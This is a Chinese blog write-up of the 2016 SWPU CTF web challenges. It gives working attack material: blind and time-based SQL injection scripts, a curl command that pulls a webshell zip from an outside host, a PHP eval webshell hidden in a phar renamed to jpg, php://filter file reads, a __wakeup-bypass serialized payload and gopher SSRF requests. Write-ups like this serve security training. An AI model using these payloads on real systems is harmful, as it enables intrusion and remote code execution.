2016 SWPU 自己做出题目的思路分享

最新推荐文章于 2022-10-11 19:28:57 发布
最新推荐文章于 2022-10-11 19:28:57 发布
阅读量3.9k 收藏 2
点赞数 2
分类专栏: ctf的wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/niexinming/article/details/52980140
版权

web1的源码我已经下载好了,地址在:http://download.csdn.net/detail/niexinming/9668799

自己擅长sql注入,而这个题目刚刚适合我http://web1.08067.me

首先这个题目过滤了一大堆东西,比如and,or,空格,%0a,%0b%0c,尤其不能忍的是过滤了逗号,简直是个坑啊

由于过滤了and和or和空格,我用%a0来代替空格,用连等判断来代替and,or的数据,下面是这个原理的一个简单例子:

mysql> select 1 from dual where 1=1=1=(select '');
Empty set (0.16 sec)

mysql> select 1 from dual where 1=1=1=(select '1');
+---+
| 1 |
+---+
| 1 |
+---+
1 row in set (0.00 sec)

mysql> select 1 from dual where 1=1=1=(select 0);
Empty set (0.19 sec)

mysql> select 1 from dual where 1=1=1=(select 1);
+---+
| 1 |
+---+
| 1 |
+---+
1 row in set (0.00 sec)



可以看出where后面的连等如果有一项的值为空或者为0的时候,那么整个查询结果都是空,否则就可以查询出东西

由于web1提示要登陆admin

所以就要用盲注,但是MySQL 字符串截取函数:left(), right(), substring(), substring_index()。还有 mid(), substr()都是需要逗号来传递参数的,而万恶的出题人却把逗号给过滤,好气哦,但是天无绝人之路,substring提供了另一个用法:SUBSTRING(str FROMpos FOR len),但是for这个参数却用不了,好心塞,不过没关系,可以从后到前一个一个猜字符了,原理是:

mysql> select substring('admin' from 5) from dual;
+---------------------------+
| substring('admin' from 5) |
+---------------------------+
| n                         |
+---------------------------+
1 row in set (0.00 sec)

mysql> select substring('admin' from 4) from dual;
+---------------------------+
| substring('admin' from 4) |
+---------------------------+
| in                        |
+---------------------------+
1 row in set (0.00 sec)

mysql> select substring('admin' from 3) from dual;
+---------------------------+
| substring('admin' from 3) |
+---------------------------+
| min                       |
+---------------------------+
1 row in set (0.00 sec)

mysql> select substring('admin' from 2) from dual;
+---------------------------+
| substring('admin' from 2) |
+---------------------------+
| dmin                      |
+---------------------------+
1 row in set (0.00 sec)

为了速度,我写了个小脚本来处理这个单调的盲注 

__author__ = 'niexinming'
import urllib2
url="http://web1.08067.me/login.php"
data="abcdefghijklmnopqrstuvwxyz1234567890"
xx=""
flag=0
listdata=list(data)
for jj in range(0,33)[::-1]:
    #print jj
    for ii in listdata:
        post_data="uname=admin'=(select(select(substring(passwd%a0from%a0"+str(jj)+"))from%a0admin%a0where%a0uname='admin')='"+ii+xx+"')='1'='1&passwd=2"
        #print post_data
        req = urllib2.urlopen(url, post_data).read()
        if(req.find('password error')>-1):
            flag=1
            xx=ii+xx
            print xx
            break
        else:
            flag=0

最后拿到admin的密码:c12366feb7373bf6d869ab7d581215cf 解密之后 1234567mn

我以为登陆了admin之后就完了,结果后面是个更大的坑啊!!!

后面是个可以执行命令的地方,测试了一下还是过滤了bash,python,php,perl,空格,但是留下了curl这个命令,空格的话linux中可以用${IFS}来代替,然后尝试下载一个zip的文件(zip里面包含一个一句话木马)在网站的根目录底下

下载指令

curl${IFS}-o${IFS}2.zip${IFS}http://xxx.xxx.xxx.xxx/2.zip

下载之后解压

unzip${IFS}2.zip

然后在网站的admin目录下就有一个2.php,地址:

http://web1.08067.me/admin/2.php

然后拿到flag

------------------------------------------------------------------------------------------web2-------------------------------------------------------------------------------------------------------------------------

web2

http://web2.08067.me:

首先这个题目给出一个提示:里面有个include.php

打开http://web2.08067.me/include.php,查看源码发现又一个提示:<!-- upload.php -->

发现有上传的地方,但是上传的地方只能上传图片文件,因为有个include.php有个任意包含漏洞,可以利用lfi读取upload.php和include.php的源码

读取源代码的方法:

http://web2.08067.me/include.php?file=php://filter/convert.base64-encode/resource=upload

把upload.php的源码以base64的方式返回回来,解码之后:

<form action="" enctype="multipart/form-data" method="post" 
name="upload">file:<input type="file" name="file" /><br> 
<input type="submit" value="upload" /></form>

<?php
if(!empty($_FILES["file"]))
{
    echo $_FILE["file"];
    $allowedExts = array("gif", "jpeg", "jpg", "png");
    @$temp = explode(".", $_FILES["file"]["name"]);
    $extension = end($temp);
    if (((@$_FILES["file"]["type"] == "image/gif") || (@$_FILES["file"]["type"] == "image/jpeg")
    || (@$_FILES["file"]["type"] == "image/jpg") || (@$_FILES["file"]["type"] == "image/pjpeg")
    || (@$_FILES["file"]["type"] == "image/x-png") || (@$_FILES["file"]["type"] == "image/png"))
    && (@$_FILES["file"]["size"] < 102400) && in_array($extension, $allowedExts))
    {
        move_uploaded_file($_FILES["file"]["tmp_name"], "upload/" . $_FILES["file"]["name"]);
        echo "file upload successful!Save in:  " . "upload/" . $_FILES["file"]["name"];
    }
    else
    {
        echo "upload failed!";
    }
}
?>

再读取include.php

http://web2.08067.me/include.php?file=php://filter/convert.base64-encode/resource=include

<html>
Tips: the parameter is file! :) 
<!-- upload.php -->
</html>
<?php
    @$file = $_GET["file"];
    if(isset($file))
    {
        if (preg_match('/http|data|ftp|input|%00/i', $file) || strstr($file,"..") !== FALSE || strlen($file)>=70)
        {
            echo "<p> error! </p>";
        }
        else
        {
            include($file.'.php');
        }
    }
?>

发现每一个地方都被限制死死的,包含的地方不能截断而且包含的文件只能是.php结尾的,上传的文件只能是图片文件

看来只有一种办法了,参考http://www.php.net/manual/zh/wrappers.phar.php

能用到phar://  这个协议了

如何创建一个phar文件呢?

方法一:

参考:https://segmentfault.com/a/1190000002166235

http://www.mamicode.com/info-detail-888559.html

现在我来创建自己的php的打包文件phar

首先在创建一个目录,名字是1

然后在1那个目录底下创建一个index.php内容是:

<?php @eval($_POST['c']);?> 
然后在1的目录外创建打包脚本phar.php内容是:

<?php
$phar = new Phar('my.phar');
$phar->buildFromDirectory(__DIR__.'/1', '/.php$/');
$phar->compressFiles(Phar::GZ);
$phar->stopBuffering();
$phar->setStub($phar->createDefaultStub('index.php'));

然后在shell中执行在1目录外面生成一个叫my.phar的打包文件

把my.phar改成my.jpg上传,然后访问:

http://web2.08067.me/include.php?file=phar://upload/heheda.jpg/index

这样一句话木马就可以执行了

方法二:

直接把一个一句话木马的php文件压缩成zip格式,然后把文件后缀改成jpg,然后上传,以同样的方式访问也能执行木马


不知道为什么用菜刀连接不到,我自己用php代码来读一下目录下有什么文件吧:

下面是php一句话读取目录:

$dh=opendir("./");while (($file = readdir($dh)) !== false){echo $file."<br>";}

然后发现flag文件在swpu_wbe2_tips.txt

直接访问:http://web2.08067.me/swpu_wbe2_tips.txt  就可以得到flag和下一个题目的提示



--------------------------------------------------------------------------------------------------------web3-----------------------------------------------------------------------------------------------------------

http://web3.08067.me/wakeup/index.php

官方给了提示:

.bak泄露,index.php.bak,function.php.bak

首先看index.php.bak的源码:

if(isset($_COOKIE['user'])){
	$login = @unserialize(base64_decode($_COOKIE['user']));
	if(!empty($login->pass)){
		$status = $login->check_login();
		if($status == 1){
			$_SESSION['login'] = 1;
			var_dump("login by cookie!!!");
		}
	}
}

看function.php.bak 

class help {
    static function addslashes_deep($value)
    {
        if (empty($value))
        {
            return $value;
        }
        else
        {
            if (!get_magic_quotes_gpc())
            {
            $value=is_array($value) ? array_map("help::addslashes_deep", $value) : help::mystrip_tags(addslashes($value));
            }
            else
            {
            $value=is_array($value) ? array_map("help::addslashes_deep", $value) : help::mystrip_tags($value);
            }
            return $value;
        }
    }
    static function remove_xss($string) { 
        $string = preg_replace('/[\x00-\x08\x0B\x0C\x0E-\x1F\x7F]+/S', '', $string);

        $parm1 = Array('javascript', 'union','vbscript', 'expression', 'applet', 'xml', 'blink', 'link', 'script', 'embed', 'object', 'iframe', 'frame', 'frameset', 'ilayer', 'layer', 'bgsound', 'base');

        $parm2 = Array('onabort', 'onactivate', 'onafterprint', 'onafterupdate', 'onbeforeactivate', 'onbeforecopy', 'onbeforecut', 'onbeforedeactivate', 'onbeforeeditfocus', 'onbeforepaste', 'onbeforeprint', 'onbeforeunload', 'onbeforeupdate', 'onblur', 'onbounce', 'oncellchange', 'onchange', 'onclick', 'oncontextmenu', 'oncontrolselect', 'oncopy', 'oncut', 'ondataavailable', 'ondatasetchanged', 'ondatasetcomplete', 'ondblclick', 'ondeactivate', 'ondrag', 'ondragend', 'ondragenter', 'ondragleave', 'ondragover', 'ondragstart', 'ondrop', 'onerror', 'onerrorupdate', 'onfilterchange', 'onfinish', 'onfocus', 'onfocusin', 'onfocusout', 'onhelp', 'onkeydown', 'onkeypress', 'onkeyup', 'onlayoutcomplete', 'onload', 'onlosecapture', 'onmousedown', 'onmouseenter', 'onmouseleave', 'onmousemove', 'onmouseout', 'onmouseover', 'onmouseup', 'onmousewheel', 'onmove', 'onmoveend', 'onmovestart', 'onpaste', 'onpropertychange', 'onreadystatechange', 'onreset', 'onresize', 'onresizeend', 'onresizestart', 'onrowenter', 'onrowexit', 'onrowsdelete', 'onrowsinserted', 'onscroll', 'onselect', 'onselectionchange', 'onselectstart', 'onstart', 'onstop', 'onsubmit', 'onunload','href','action','location','background','src','poster');
        
        $parm3 = Array('alert','sleep','load_file','confirm','prompt','benchmark','select','and','or','xor','update','insert','delete','alter','drop','truncate','script','eval','outfile','dumpfile');

        $parm = array_merge($parm1, $parm2, $parm3); 

        for ($i = 0; $i < sizeof($parm); $i++) { 
            $pattern = '/'; 
            for ($j = 0; $j < strlen($parm[$i]); $j++) { 
                if ($j > 0) { 
                    $pattern .= '('; 
                    $pattern .= '(&#[x|X]0([9][a][b]);?)?'; 
                    $pattern .= '|(�([9][10][13]);?)?'; 
                    $pattern .= ')?'; 
                }
                $pattern .= $parm[$i][$j]; 
            }
            $pattern .= '/i';
            $string = preg_replace($pattern, '****', $string); 
        }
        return $string;
    }
    static function mystrip_tags($string)
    {
        $string =  help::new_html_special_chars($string);
        $string =  help::remove_xss($string);
        return $string;
    }
    static function new_html_special_chars($string) {
        $string = str_replace(array('&', '"', '<', '>','&#'), array('&', '"', '<', '>','***'), $string);
        return $string;
    }
    // 实体出库
    static function htmlspecialchars_($value)
    {
        if (empty($value))
        {
            return $value;
        }
        else
        {
            if(is_array($value)){
                foreach ($value as $k => $v) {
                    $value[$k] = self::htmlspecialchars_($v);
                }
            }else{
                $value = htmlspecialchars($value);
            }
            return $value;
        }
    }
    //sql 过滤
    static function CheckSql($db_string,$querytype='select')
    {
        $clean = '';
        $error='';
        $old_pos = 0;
        $pos = -1;
        if($querytype=='select')
        {
            $notallow1 = "[^0-9a-z@\._-]{1,}(load_file|outfile)[^0-9a-z@\.-]{1,}";
            if(preg_match("/".$notallow1."/i", $db_string))
            {
                exit("Error");
            }
        }
        //完整的SQL检查
        while (TRUE)
        {
            $pos = strpos($db_string, '\'', $pos + 1);
            if ($pos === FALSE)
            {
                break;
            }
            $clean .= substr($db_string, $old_pos, $pos - $old_pos);
            while (TRUE)
            {
                $pos1 = strpos($db_string, '\'', $pos + 1);
                $pos2 = strpos($db_string, '\\', $pos + 1);
                if ($pos1 === FALSE)
                {
                    break;
                }
                elseif ($pos2 == FALSE || $pos2 > $pos1)
                {
                    $pos = $pos1;
                    break;
                }
                $pos = $pos2 + 1;
            }
            $clean .= '$s$';
            $old_pos = $pos + 1;
        }
        $clean .= substr($db_string, $old_pos);
        $clean = trim(strtolower(preg_replace(array('~\s+~s' ), array(' '), $clean)));
        if (strpos($clean, '@') !== FALSE  OR strpos($clean,'char(')!== FALSE OR strpos($clean,'"')!== FALSE 
        OR strpos($clean,'$s$$s$')!== FALSE)
        {
            $fail = TRUE;
            if(preg_match("#^create table#i",$clean)) $fail = FALSE;
            $error="unusual character";
        }
        elseif (strpos($clean, '/*') !== FALSE ||strpos($clean, '-- ') !== FALSE || strpos($clean, '#') !== FALSE)
        {
            $fail = TRUE;
            $error="comment detect";
        }
        elseif (strpos($clean, 'sleep') !== FALSE && preg_match('~(^|[^a-z])sleep($|[^[a-z])~is', $clean) != 0)
        {
            $fail = TRUE;
            $error="slown down detect";
        }
        elseif (strpos($clean, 'benchmark') !== FALSE && preg_match('~(^|[^a-z])benchmark($|[^[a-z])~is', $clean) != 0)
        {
            $fail = TRUE;
            $error="slown down detect";
        }
        elseif (strpos($clean, 'load_file') !== FALSE && preg_match('~(^|[^a-z])load_file($|[^[a-z])~is', $clean) != 0)
        {
            $fail = TRUE;
            $error="file fun detect";
        }
        elseif (strpos($clean, 'into outfile') !== FALSE && preg_match('~(^|[^a-z])into\s+outfile($|[^[a-z])~is', $clean) != 0)
        {
            $fail = TRUE;
            $error="file fun detect";
        }
        if (!empty($fail))
        {
            exit("Error" . $error);
        }
        else
        {
            return $db_string;
        }
    }
}

class login{
	var $uid = 0;
    var $name='';
	var $pass='';
	
	//检查用户是否已登录
    public function check_login(){
		mysql_conn();
		$sqls = "select * from phpinfoadmin where username='$this->name'";
		$sqls = help::CheckSql($sqls);
		$re = mysql_query($sqls);
		$results = @mysql_fetch_array($re);
		//echo $sqls . $results['passwd'];
		mysql_close();
		if (!empty($results))
		{
			if($results['passwd'] == $this->pass)
			{
				return 1;
			}
			else
			{
				return 0;
			}
		}
		}
	//预防cookie某些破坏导致登陆失败
	public function __destruct(){
        $this->check_login();
    }
	//反序列化时检查数据
    public function __wakeup(){
		$this->name = help::addslashes_deep($this->name);
		$this->pass = help::addslashes_deep($this->pass);
    }
}
?>



 看到源码中限制好多东西,似乎基本没有什么办法,但是php5.4以下有个漏洞 

 

可以看http://www.venenof.com/index.php/archives/167/
 

可以参考ven牛的文章就可以搞定这个题目了
 

可以bypass的payload是这样的:
 

 

O:5:"login":4:{s:3:"uid";i:0;s:4:"name";s:6:"heheda";s:4:"pass";s:32:"00af6f190235a168c57be5cff86668b0";}
 

 关键点是login":4: 里面这个4,这个4代表login类的变量有4个,但是实际上login类的变量有3个(uid,name,pass),如果类的变量和实际传入的不一样,反序列化后的类就不会执行魔术方法:__wakeup(),但是会执行魔术方法:__destruct() 

 

所以利用这个漏洞进行sql注入:
 

但是这个漏洞没有任何回显,只能靠基于时间的盲注来拿到数据了
 

查看源码之后发现,他还是禁止了benchmark,sleep,load_file,into outfile,没有办法,我想到要用到一些消耗资源的方式让数据库的查询时间尽量变长,而消耗数据库资源的最有效的方式就是让两个大表做迪卡尔积,这样就可以让数据库的查询慢下来,而我最后找到系统表information_schema.columns 数据量比较大,可以满足我的要求,
 

让他们做笛卡尔积:
 

 

select count(*) from information_schema.columns, information_schema.columns T1,information_schema.columns T2
 

 

本地的运行的时间在十三秒左右
 

根据这个理论就可以不用benchmark,sleep而做延时注入了
 

而后来查资料,这种方法不是我自己发明的,这个有个专门的术语叫:heavy query ,可以参考更多例子在:http://www.sqlinjection.net/heavy-query/
 
 

写一个脚本让它慢慢跑,然后自己去洗澡
 

 

__author__ = 'niexinming'
import base64
import urllib
import urllib2
import base64
import time
#ll=list("abcdefghijklmnopqrstuvwxyz1234567890")
#llascii=[]
#for jj in ll:
#    llascii.append(ord(jj))
for kk in range(1,32):
    print "di : "+str(kk)
    for i in range(32,127):
       start= time.time()
       url="http://web3.08067.me/wakeup/index.php"
       sql="select flag from flag"
       post_data="username=heheda&password=heheda&login="
       payload="admin'and ascii(substring((%s),%s,1))=%s and (select count(*) from information_schema.columns, information_schema.columns T1,information_schema.columns T2)=1 and '1'='1" % (sql,str(kk),str(i))
       xueliehua='''O:5:"login":4:{s:3:"uid";i:0;s:4:"name";s:%s:"%s";s:4:"pass";s:32:"6be530e78ade605347059701a54f996e";}
       ''' % (str(len(payload)),payload)
       #print xueliehua
       b64=base64.b64encode(xueliehua)
       urlencodedata=urllib.quote(b64)
       heads={}
       heads["Cookie"]="user="+urlencodedata
       #print urlencodedata
       req = r=urllib2.Request(url,data=post_data,headers=heads)
       resual= urllib2.urlopen(r)
       resual.read()
       end= time.time()
       #print str(end-start)+":",
       #print chr(i)
       if 20>(end-start)>8:
           print "this this:"+str(kk)+" : "+chr(i)
           break


 

 洗完澡之后就发现flag已经躺好了 

 


 
 

--------------------------------------------------------------------------------------------------------web5-----------------------------------------------------------------------------------------------------------
 

http://web5.08067.me/
 

首先是官方给的提示是:
 

ssrf,关注下其他的协议,flag不在本机
 

然后就用file:///etc/sysconfig/network-scripts/ifcfg-eth0 读取网卡地址,发现
 
 

 

DEVICE=eth0
HWADDR=00:0C:29:F0:AE:2A
TYPE=Ethernet
UUID=a1ca5d0e-61c9-4693-82ee-437eb0331617
ONBOOT=yes
NM_CONTROLLED=yes
BOOTPROTO=static
IPADDR=172.16.181.165
NETMASK=255.255.255.0
GATEWAY=172.16.181.2
DNS1=114.114.114.114
DNS2=172.16.181.2
 

 发现 
这台主机 所处的内网的网段是在172.16.181.0/24段。 

 

 

然后探测下C段,发现只有172.16.181.166主机的80 存在一个应用。
 

尝试扫一波目录,发现了一个常规目录admin/login.php,访问之,发现一个登陆表单
 

但是这个表单数据的提交是用post来提交,这怎么办?
 

这时候就要请出一个古老的协议了:
 

gopher协议,百度百科有对这个协议的介绍:
 

http://baike.baidu.com/link?url=SBvPFzKhDIG2BP4WRdVnOL1EsNUxM-X9JllDG7h-FL3VkYfnTd7VMPZIV2iMJBF1UK4REpf_eo3o1x8jJkp_pK
 

然后利用gopher来构造post的请求包
 

http://web5.08067.me/index.php?url=gopher%3A%2f%2f172.16.181.166%3A80%2f_POST%20%2fadmin%2fwllmctf_login.php%20HTTP%2f1.1%250d%250aHost%3A%20172.16.181.166%250d%250aUser-Agent%3A%20curl%2f7.43.0%250d%250aAccept%3A%20%2a%2f%2a%250d%250aContent-Length%3A%2029%250d%250aContent-Type%3A%20application%2fx-www-form-urlencoded%250d%250a%250d%250ausername%3Dadmin%26password%3D12312%26submit%3Dsubmit
 发现返回来的数据是:
 

password error
 

这里构造的时候要注意url 的编码和Content-Length的长度不能算错
 

接着测试post数据username=admin' and '1'='1&password=123
 


 http://web5.08067.me/index.php?url=gopher%3A%2f%2f172.16.181.166%3A80%2f_POST%20%2fadmin%2fwllmctf_login.php%20HTTP%2f1.1%250d%250aHost%3A%20172.16.181.166%250d%250aUser-Agent%3A%20curl%2f7.43.0%250d%250aAccept%3A%20%2a%2f%2a%250d%250aContent-Length%3A%2041%250d%250aContent-Type%3A%20application%2fx-www-form-urlencoded%250d%250a%250d%250ausername%3Dadmin%27%20and%20%271%27%3D%271%26password%3D12312%26submit%3Dsubmit
 

发现返回来的数据是:
 

password error
 

但是测试post数据username=admin' and '1'='2&password=123
 

发现返回来的数据是:
 

error names
 

发现在username的地方有sql注入
 


 
 

然后写一个脚本来跑数据
 

 

# -*- coding: utf-8 -*-

import re
import os
import requests
import time
import urllib
sql="select password from ssrf"
for x in range(1,40):
	print "di:"+str(x)
	for i in range(32,127):
		payload="admin' and 1=1 and (select(ascii(mid(((%s)),%s,1))=%s))" % (sql,x,i)
        	payload=payload+"%23"
        	length=len(payload)
        	content_len=length+23
        # print content_len
        	u_payload=urllib.quote(payload)
        	url="http://web5.08067.me/index.php?url=gopher%3A%2f%2f172.16.181.166%3A80%2f_POST%20%2fadmin%2fwllmctf_login.php%20HTTP%2f1.1%250d%250aHost%3A%20172.16.181.166%250d%250aUser-Agent%3A%20curl%2f7.43.0%250d%250aAccept%3A%20%2a%2f%2a%250d%250aContent-Length%3A%20"+str(content_len)+"%250d%250aContent-Type%3A%20application%2fx-www-form-urlencoded%250d%250a%250d%250ausername%3D"+u_payload+"%26password%3D1212"
        # print url

        	res=requests.get(url).text
        	if "password" in res:
            		print chr(i)
			break
 

 最后admin的密码是:2dc8661a5be16d50941534eae3fffaa4 

 

解密之后是:xiaozhang123
 

然后构造最后登陆的payload:
 

http://web5.08067.me/index.php?url=gopher%3A%2f%2f172.16.181.166%3A80%2f_POST%20%2fadmin%2fwllmctf_login.php%20HTTP%2f1.1%250d%250aHost%3A%20172.16.181.166%250d%250aUser-Agent%3A%20curl%2f7.43.0%250d%250aAccept%3A%20%2a%2f%2a%250d%250aContent-Length%3A%2036%250d%250aContent-Type%3A%20application%2fx-www-form-urlencoded%250d%250a%250d%250ausername%3Dadmin%26password%3Dxiaozhang123%26submit%3Dsubmit
 

拿到最后的flag
 

                

        

        

    




    

      

        

            

              
                
                  niexinming
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                    2
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    2
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      

            

                专栏目录
          










                



	

		

			

				
					
SWPU 2016 web 部分思路整理

				
			

			

				

					Bendawang's Blog
				

				

					11-01
					
					4035
					
				

			

		

		

			
				
SWPU 2016 web 部分思路整理

			
		

	



                

              
                



	

		

			

				
					
简单图片隐写术破解

					
热门推荐

				
			

			

				

					PPPig
				

				

					03-03
					
					2万+
					
				

			

		

		

			
				
这是百度杯上的一个小测试题,首先点击访问看到图片
        
一看名字就猜到应该是包含了压缩包,但是我们还是用工具看看,保存图片放到kali中,在终端切换到图片所在目录用binwalk查看,执行命令:binwalk zip.jpg 


发现确实存在压缩包文件,继续将其提取出来,执行命令:binwalk -e zip.jpg




多出了一个压缩包文件,我们将其拿出来放

			
		

	



                


  
              

                


	

		

			

				
					
2016 SWPU CTF web1题目源码

				
			

			

				

					10-31
				

			

		

		

			
				
2016 SWPU CTF web1题目源码

			
		

	





	

		

			

				
					
BUUCTF:[SWPUCTF 2016]Web blogsys

				
			

			

				

					末初的CSDN博客
				

				

					07-28
					
					1420
					
				

			

		

		

			
				
题目地址:https://buuoj.cn/challenges#[SWPUCTF%202016]Web%20blogsys

源码地址:https://github.com/CTFTraining/swpuctf_2016_web_blogsys
common.php
//common.php
foreach (Array("_POST", "_GET", "_COOKIE") as $key) {
    foreach ($$key as $k => $v) {
        if (is_a

			
		

	



		

			
		



	

		

			

				
					
文件包含&PHP伪协议利用

				
			

			

				

					菜鸟耿耿
				

				

					09-16
					
					5022
					
				

			

		

		

			
				
文件包含
文件包含漏洞是“代码注入”的一种。其原理就是注入一段用户能控制的脚本或代码,并让服务端执行。“代码注入”的典型代表就是文件包含。
要想成功利用文件包含漏洞进行攻击,需要满足以下两个条件:

Web应用采用include()等文件包含函数通过动态变量的方式引入需要包含的文件;
用户能够控制该动态变量。

常见的导致文件包含的函数:
PHP:include()、include_once()、require()、require_once()等;
1.php文件包含可以直接执行包含文件的代码,包含的文件格

			
		

	





	

		

			

				
					
php文件上传+文件包含(phar伪协议)

				
			

			

				

					WFC1006848997的博客
				

				

					11-22
					
					5175
					
				

			

		

		

			
				
test.bugku-web-upload—文件上传与文件包含组合
右键查看源码发现

继续查看源码,提示参数是file,还有一个upload.php

跟进upload.php,是个上传界面

那就可以猜测出是 文件上传与文件包含的组合,所以直接先使用伪协议查看源码,使用的是php://filter协议
php://filter/convert.base64-encode/resource=

首先读取include.php的源码

发现后缀多了一个.php,所以就不加.php了

base64解码
&l

			
		

	





	

		

			

				
					
2016 SWPU CTF web4

				
			

			

				

					10-31
				

			

		

		

			
				
2016 SWPU CTF web4 题目的源码压缩包,压缩包地址是:http://web4.08067.me/web/web.zip,如果服务器关了就只有这里有了

			
		

	





	

		

			

				
					
SWPU体育公选课理论考试题目及答案Word文档

				
			

			

				

					12-28
				

			

		

		

			
				
选了体育公选课的同学还在为只能在公众号的网页里面慢慢看题目而烦恼嘛?这个资源整理好了word文档,直接使用查找功能答题速又准确!

			
		

	





	

		

			

				
					
SWPU大数据概论课程报告

					
最新发布

				
			

			

				

					01-31
				

			

		

		

			
				
仅作备份

			
		

	





	

		

			

				
					
[SWPUCTF 2021 新生赛]traditional

				
			

			

				

					03-15
				

			

		

		

			
				
SWPUCTF 2021 新生赛的传统题目中,我们看到了一道有趣的密码题目,它与八卦图和二进制数学有着紧密的联系。莱布尼茨是西方的二进制数学的发明者,他受到中国的八卦图的启发,演绎并推论出了数学矩阵,最后创造了...

			
		

	





	

		

			

				
					
CTF-实验吧-女神

				
			

			

				

					kongcz的专栏
				

				

					08-02
					
					1286
					
				

			

		

		

			
				
猫流大大发现一个女神,你能告诉我女神的名字么(名字即是flag)

解题链接:http://ctf5.shiyanbar.com/misc/nvshen.zip

把压缩包下下来之后看到好像是base64编码的,果断复制到notepad++里面,用插件解密





解密得到的东西开头是的png文件的头,将该文件保存为png格式





可以看到是一张能打开的图片,图片上是个不认识的女神...

			
		

	





	

		

			

				
					
CTF题库>女神又和大家见面了

				
			

			

				

					qq_42777804的博客
				

				

					08-17
					
					862
					
				

			

		

		

			
				
不用提示

格式:SimCTF{}



打开后就是美女的图片 哈哈哈哈哈 

1.重命名为 .zip 进行解压得到



可以放着歌做着题  看看描述



很明显了 音频隐写了 MP3Stego

(之前的文章有这个工具的下载链接)

2. 进入 目录并执行命令

Decode.exe -X -P simctf music.mp3



输出 txt文件 ...

			
		

	





	

		

			

				
					
命令执行各种绕过总结

				
			

			

				

					m0_64815693的博客
				

				

					10-11
					
					8544
					
				

			

		

		

			
				
最近做了题目很多都有命令执行的,这里给自己做一次总结,也给大家一个参考,有各种绕过,十分的详细哦

			
		

	





	

		

			

				
					
base解码_php://filter在一次CTF中base被过滤的利用

				
			

			

				

					weixin_39565910的博客
				

				

					11-27
					
					860
					
				

			

		

		

			
				
0x00 简介在一次线下ctf中的web题有一道关于php://filter伪协议的利用0x01题目分析靶机环境http://192.168.1.151:88/flag.php 存放flag信息的http://192.168.1.151:88/index.php 注释中有include1.phpinclude1代码如下error_reporting(0);    @$file = $_G...

			
		

	





	

		

			

				
					
Bugku 文件包含2 writeup 绕过过滤

				
			

			

				

					zazazrt的博客
				

				

					02-18
					
					1701
					
				

			

		

		

			
				


首先附上网站源码http://123.206.31.85:49166/

index.php


&lt;!-- upload.php --&gt;
&lt;?php
    if(!isset($_GET['file']))
    {
        header('Location: ./index.php?file=hello.php');
        exit();
    }
...

			
		

	





	

		

			

				
					
对xxe漏洞靶机编写poc和exp

				
			

			

				

					rlenew的博客
				

				

					11-25
					
					1091
					
				

			

		

		

			
				
主机地址:172.16.131.85
靶机地址:192.168.6.211
(这里不再对xxe漏洞进行讲解,自行百度。主要分为两类有回显xxe和无回显xxe)
直接访问靶机地址

利用dirb扫描得到了xxe和admin.php页面,访问xxe
抓包进行测试
因为已经是xxe靶机了,所以直接开始编写poc代码。poc的主要代码段为
def poc(url):
    payload = '<?xml version="1.0" encoding="UTF-8"?>\n'
    payload 

			
		

	





	

		

			

				
					
XXE漏洞学习

				
			

			

				

					zhangge3663的博客
				

				

					02-29
					
					992
					
				

			

		

		

			
				
0x00 什么是XML

1.定义

XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。



2.文档结构

XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。






<!--XML声明-->
<?xml ...

			
		

	





	

		

			

				
					
2016 SWPU web7的复现与思考

				
			

			

				

					一个码农的笔记
				

				

					11-03
					
					3666
					
				

			

		

		

			
				
2016 SWPU比赛结束了,但是web7还是有点没有搞太懂,于是根据官方的wp来复现了一下,官方的wp地址:http://bobao.360.cn/ctf/detail/174.html

首先搭建环境,要安装的依赖是python的:cherrypy和redis(cherrypy的安装可以直接:pip install cherrypy,如果网速比较慢,可以下载我上传好的压缩包:http://

			
		

	





	

		

			

				
					
NSCTF-web题目writeup

				
			

			

				

					cainsoftware的博客
				

				

					10-01
					
					1030
					
				

			

		

		

			
				
Dream II

看题目提示的

仔细看用什么提示方式,页面进去提示了“put me a message then you can get the flag”

说明重点就是怎么把信息传过去,这里可以先测试GET POST请求会发现都不行 所以重点就是这个“PUT”这个词 所以用burpsuite 用PUT方式丢一个“message”的数据包得到如下图:

看了一眼觉得是base64加密



WECLOME

查看源代码找到了前面的flag



抓个包看一下



抓包拼接就可以获得flag...

			
		

	





	

		

			

				
					
[SWPUCTF 2018]SimplePHP

				
			

			

				

					07-28
				

			

		

		

			
				
根据提供的信息,这个问题可能是关于SWPUCTF 2018比赛中的一个题目题目名称为"SimplePHP"。然而,由于提供的引用内容不完整,无法给出更具体的答案。如果您有关于这个问题的更多信息,请提供更多的上下文,以便我...

			
		

	



              



  
“相关推荐”对你有帮助么?

  

      
    
          
  • 
              
    
                  
                  
              
    
              
    非常没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    一般
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    有帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    非常有帮助
    
          
    • 
      

      

      

          
          提交
      

      

  




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

